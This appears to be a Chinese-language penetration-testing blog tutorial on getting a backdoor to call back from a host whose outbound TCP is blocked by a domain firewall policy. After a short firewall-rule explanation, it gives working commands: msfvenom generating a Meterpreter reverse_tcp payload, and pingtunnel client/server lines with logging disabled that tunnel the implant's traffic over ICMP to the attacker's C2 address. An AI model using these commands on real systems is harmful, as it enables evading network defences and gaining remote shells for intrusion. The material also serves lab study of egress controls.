-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)
-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)
-防火墙配置的学习
理解出站入站规则的区别,及域控同步设置
出站规则:是设置防火墙的主机对外连接的规则,一般来说较为宽松
入站规则:是外部访问部署防火墙主机时需要遵守的规则,一般较为严谨
设置规则也可以分为对本地的应用程序 对协议 对端口进行完全自定义设置
![](https://img-blog.csdnimg.cn/img_convert/178258698d8695e6a73f923f239b777c.png)
当域控DC设置了防火墙策略后,可以在域控机器的组策略管理器新建策略
这里设置一个针对 TCP协议所有端口所有程序禁止出网的协议,配置中选择所有,名称设置为 notcp
![](https://img-blog.csdnimg.cn/img_convert/96c7182b72fe3ed257e3cf304beed107.png)
隧道技术:前提提权完的权限
TCP出网被限制如何上线
先按照常规方法生成一个CS木马,测试防火墙策略是否有用
运行木马后无法上线,且该主机可以ping通外部,但是无法浏览器访问
![](https://img-blog.csdnimg.cn/img_convert/2f42714c05424f5ec0019fe054b598f3.png)
由于ping命令使用的是Icmp协议 所以可以继续ping通,且icmp协议属于网络层协议,禁止了tcp协议的出网,所以导致使用http协议访问百度的站点打不开,但是网络层的icmp协议不会受到影响
这里在cs上重新起一个监听器
回连地址设置为127.0.0.1 端口为2222
![](https://img-blog.csdnimg.cn/img_convert/f45ef671fde73f593a3543f893cba7f6.png)
然后使用该监听器生成一个木马
![](https://img-blog.csdnimg.cn/img_convert/8900e00077ab0a64b97fb90a81046e8f.png)
注意选择的生成模式
将木马127.exe和pingtunnel.exe放入靶机后,在linux上使用pingtunnel的linux版本开启监听状态 ./pingtunnel -type server
受控主机先运行命令 pingtunnel.exe -type client -l 127.0.0.1:2222 -s CS服务端IP -t CS服务端IP+端口 -tcp 1 -noprint 1 -nolog 1
然后运行127.exe文件 未能成功上线 可能是公网环境过于复杂
pingtunnel:项目地址 https://github.com/esrrhs/pingtunnel
这里使用本地kali的msf来进行测试
先生成一个木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe > bliss.exe
在使用msf监听模块监听一个其他的端口
![](https://img-blog.csdnimg.cn/img_convert/7900df072d7c77e2e1222a5b5d52eb4c.png)
然后在受控主机输入
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.50.128 -t 192.168.50.128:3355 -tcp 1 -noprint 1 -nolog 1
然后在点开木马 bliss.exe 即可上线